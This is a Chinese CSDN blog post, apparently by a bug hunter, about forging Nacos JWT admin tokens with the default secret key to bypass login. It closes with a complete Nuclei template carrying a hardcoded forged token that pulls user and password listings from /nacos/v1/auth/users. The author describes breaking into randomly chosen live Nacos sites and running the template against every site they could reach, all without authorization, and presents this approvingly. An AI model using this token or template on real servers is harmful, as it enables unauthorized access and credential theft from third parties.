记一次CNVD证书挖掘

最新推荐文章于 2024-05-14 09:04:43 发布
最新推荐文章于 2024-05-14 09:04:43 发布
阅读量806 收藏 7
点赞数
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Willard_King/article/details/131467922
版权
文章讲述了作者在一次挖洞过程中发现Nacos系统存在未授权访问漏洞。Nacos是阿里开源的云原生服务发现和配置管理平台。作者通过研究JWTtoken的结构,发现可以利用默认密钥构造JWT来绕过登录验证。利用在线工具生成JWT并成功访问了系统后台,进而编写Nuclei脚本批量检测此漏洞。
摘要由CSDN通过智能技术生成

在某一次挖洞的过程中,灯塔扫描出来一个Nacos未授权访问的漏洞

在好奇心的驱使下,我去搜索了一下这个名为Nacos的系统。Nacos是阿里维护的一个开源的项目,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

然后就开始了我的挖洞之旅。我先是通过官网提供的控制台样例去了解这个系统。通过BP抓包,获取到系统登录成功的响应包。我们可以看到该系统是通过JWT token进行鉴权,鉴权点在返回包的Authorization头部和响应体的accessToken字段

JWT(Json web token)是为了在网络应用环境间传递声明而执行的一种基于JSON的开发标准。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。

JWT由三部分组成:header(头部)、payload(载荷)、signature(签名)。JWT的格式为:header.payload.signature

header部分一般包含两部分信息:

  • 声明类型,这里是jwt

  • 声明加密的算法 通常直接使用 HMAC SHA256

完整头部如下:

{  'typ': 'JWT',  'alg': 'HS256'}

然后将头部进行base64加密得到第一部分

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9

payload部分就是存放有效信息的地方,一般包含三部分

  • 标准中注册的声明

  • 公共的声明

  • 私有的声明

将我们获取到的token解析后就会得到以下部分

{
  "sub": "nacos",
  "exp": 1687248824
}

signature部分是最重要的部分,它是一个签证信息,这个签证信息由三部分组成:

  • header (base64后的)

  • payload (base64后的)

  • secret

这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串(头部在前),然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分。

了解了JWT token是如何构成的之后,我就想着,我是否可以自行构建一个token,从而绕过登录,直接进入后台呢,但是想要生成一个JWT token,密钥部分是必不可少的。然后我就开始翻官方的部署手册。不得不说,官方的部署手册是真的不辍。里面提供了默认的密钥(在2.2.0版本以前的nacos配置文件中也有,在那之后就被删除了),说干就干,咱赌的就是他们没有修改默认密钥。

 

如今已经获取到了密钥,使用JWT Token在线生成工具可以直接生成。如下:加密方式选择HS256,Type选择jwt,选择一个token过期时间,面向用户我们填nacos,因为该系统默认的管理员用户就是nacos,最后输入我们从部署手册获取到的密钥。点击生成

获取到token后,我们尝试随意选择一个Nacos网站。默认口令:nacos/nacos无法登录成功。

BP拦截响应包

替换响应包格式,将我们生成的token输入进去,直接放包

成功进入系统。

随后我编写了一个nuclei脚本(脚本在文章末尾),尝试用这个token去访问所有我能获取到的nacos站点后台,均能成功。

最终也是成功拿下了CNVD原创漏洞证书


nuclei脚本源码:

id: nacos-unauthorized

info:
  name: Nacos unauthorized
  author: pb
  severity: critical
  description: Nacos unauthorized
  tags: nacos,unauthorized

requests:
  - raw:
      - |
        GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyIiOltdLCJpYXQiOjE2ODgwNjIzMDksImV4cCI6MTY4ODE0MDc5OSwiYXVkIjoiIiwiaXNzIjoiIiwic3ViIjoibmFjb3MifQ.qONuvSSkjZOqFdegldvduChcYFIHRjUEIvlc0SyHT9I HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:

      - type: word
        part: body
        condition: and
        words:
          - '"username"'
          - '"password"'
          
      - type: status
        status:
          - 200

# Enhanced by mp on 2022/02/28
waf大哥让我过去吧
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
【愚公系列】2023年06月 网络安全高级班 084.CNVD原创漏洞证书挖掘思路)
时光隧道
06-02 7973
CNVD原创漏洞证书挖掘步骤:搜集信息:收集相关网站、应用程序、操作系统等的漏洞信息,包括CVE编号、漏洞类型、危害程度等。端口扫描:通过端口扫描工具扫描目标IP地址,找到开放的端口和服务,确定需要测试的应用程序和系统。漏洞验证:使用漏洞验证工具或手工验证漏洞,确认漏洞存在性和危害程度。漏洞利用:针对已验证的漏洞进行攻击测试,确认漏洞的可利用性和危害程度。报告编写:根据漏洞测试结果,编写漏洞报告,包括漏洞描述、漏洞影响、漏洞利用方式、漏洞修复建议等。
CNVD出报告专用和42常见的的漏洞模板
最新发布
06-02
CNVD(China National Vulnerability Database)是中国国家信息安全漏洞库,它是我国网络安全防护的重要资源,用于收集、整理、验证、发布网络安全漏洞信息。这份名为“CNVD出报告专用和42常见的漏洞模板”的压缩包...
渗透测试挖掘漏洞获取CNVD证书的经验分享
08-21
渗透测试挖掘漏洞获取CNVD证书的经验分享
漏洞挖掘分析_审计挖掘CNVD通用漏洞_手把手教白客录贴
程序员三九的博客
05-14 972
前言本次内容对cnvd通用漏洞库中的进行一个代码审计和漏洞复现,对cnvd漏洞库里的几处漏洞进行复现挖掘,发现几处新的漏洞点。本次实验为靶机环境。本次内容仅用于学习和研究
【漏洞挖掘挖掘CNVD证书
信安是不可或缺的一部分!
01-06 3446
国家信息安全漏洞共享平台(简称CNVD),对于白帽子来说,挖掘的漏洞提交后会有一定的奖励,如积分可以兑换京东卡,这里介绍的是如何挖掘cnvd证书证书的条件如下。
一次cnvd挖掘过程
YJ_12340的博客
10-16 2950
曾经的我,以为挖掘cnvd是一个非常遥不可及的事情,注册资产5000万黑盒10案例(目前还不会代码审计吖,后续会努力学习吖!)这个门槛就已经难住我了(脚本小子的自述)。
cnvd挖掘
qq_45322343的博客
11-09 448
事件型事件型漏洞必须是三大运营商(移动、联通、电信)的中高危漏洞,或者党政机关、重要行业单位、科研院所、重要企事业单位(如:中央国有大型企业、部委直属事业单位等)的高危事件型漏洞才会颁发原创漏洞证书通用型中危及中危以上的通用性漏洞(CVSS2.0基准评分超过4.0)软件开发商注册资金大于等于5000万人民币或者涉及党政机关、重要行业单位、科研院所、重要企事业单位(如:中央国有大型企业、部委直属事业单位等)的高危事件型漏洞通用型漏洞得十个网络案例以上**
CNVD证书
weixin_43263451的博客
09-11 1985
一次拿到cnvd证书纪念一下,哈哈哈哈哈
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
cnvd出报告专用.docx
06-19
文件内容:包含cnvd的各种漏洞详情——危害——修复建议;直接复制—粘贴即可完成报告;即可用于写渗透测试报告,也可提交各种src
【官方】CNVD成员单位申请材料模板
06-12
CNVD,全称为“中国国家信息安全漏洞库”(China National Vulnerability Database),...通过这一过程,单位可以得到CNVD的专业指导,提高自身的安全防护能力,同时也有机会与其他业界领先的安全机构进行交流与合作。
自动化挖掘cnvd证书脚本
m0_49936858的博客
08-12 671
通过公司名称,在fofa上搜索可能存在通用产品的公司,原理是判断网站标题数目以及独立IP数达到一定条件时将该标题以及公司名称导出;如果想挖掘cnvd证书,可导出注册资金大于5000w的公司到这个脚本中进行通用系统收集。该项目使用了免费代理池项目作为支撑,因为fofa短时间搜索不同关键词可能将导致延时错误,多次出现错误后fofa可能将会封锁你的IP或者限制访问速度。启动完代理池后就可以将想要搜集的公司名称导出,放到gs.txt进行搜索爬取,直接使用python3启动该脚本,输出结果在company.txt。.
p88 SRC挖掘-拿下CNVD证书开源&闭源&售卖系统
weixin_43263566的博客
04-03 995
SRC挖掘-拿下CNVD证书开源&闭源&售卖系统
p87、SRC挖掘-CNVD证书平台挖掘技巧
weixin_43263566的博客
04-01 446
p87、SRC挖掘-CNVD证书平台挖掘技巧
SRC漏洞挖掘--CNVD国家信息安全漏洞共享平台
youmaob的博客
03-27 2934
SRC漏洞挖掘--CNVD国家信息安全漏洞共享平台
CNVD证书】Alkacon OpenCms_安装和配置
soldi_er的博客
01-22 2561
文章目录下载下载代码压缩包参考文章安装项目根目录Tomcat应用服务器配置安装OpenCms配置opencms参考文章 下载 下载代码压缩包 简介:OpenCms是一个专业级别的开源网站内容管理系统。OpenCms可以非常容易的帮助建立和管理复杂的网站而无需专业的HTML知识。当使用一个复杂的模板引擎来规划站点,它提供一个类似于我们熟知的office应用的所见即所得编辑器来帮助使用者创建内容。OpenCms是一个完全开源的软件,它不需要任何许可费用。 访问 OpenCms官网,需要注册才能下载,点击注册提示
CNVD证书经验分享
2302_76672693的博客
06-14 1043
CNVD证书经验分享
第一挖掘CNVD通用(无证书
da_chuan_chuan的博客
01-13 4251
文章目录前言一、CNVD通用挖掘过程二、公益SRC100+总结 前言 本文主要分享自己第一次挖掘到通用型漏洞的经历,漏洞是2021年挖掘到的,由于自己比较懒惰现在才来录。主要是想录自己第一次挖掘到通用的喜悦之情。自己挖掘思路比较low,各位大佬看到了,勿喷。 一、CNVD通用挖掘过程 本次通用型挖掘并没有进行代码审计,主要是运气好,在一次盲注中发现。当时自己在批量提交公益SRC,想混混排名(但是一直上不去,还是太懒惰,以后挖洞要勤快一点儿了),发现有两三个站点的内容布局大致相似,自己判断是属于同一个
急速水CNVD证书,小水怡情、大水伤身、强水灰飞烟灭
Love&Share
12-12 6483
文章目录收录标准刷洞方法审核流程 从另一个角度,以黑盒的方式快速刷CNVD通用漏洞证书 https://www.cnvd.org.cn 首先要明确什么样的通用漏洞可以发证书 收录标准 这里的收录标准是能获得证书的标准 事件型 事件型漏洞必须是三大运营商(移动、联通、电信)的中高危漏洞,或者党政机关、重要行业单位、科研院所、重要企事业单位(如:中央国有大型企业、部委直属事业单位等)的高危事件型漏洞才会颁发原创漏洞证书 通用型 中危及中危以上的通用性漏洞(CVSS2.0基准评分超过4.0) 软件开发商.
cnvd漏洞挖掘教程
02-29
很抱歉,我不能提供关于漏洞挖掘的教程或指导。漏洞挖掘是一项高级技术,需要深入的计算机安全知识和经验。同时,漏洞挖掘也是一个敏感的话题,需要遵守法律和道德规范。 如果您对计算机安全感兴趣,我建议您从基础开始学习,了解网络安全、系统安全、应用程序安全等方面的知识。您可以参考一些权威的安全学习资源,如OWASP(开放式Web应用程序安全项目)、CVE(通用漏洞和暴露)数据库等。 另外,参加相关的安全培训课程或者加入安全社区也是一个不错的选择,这样您可以与其他安全专业人士交流和学习。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值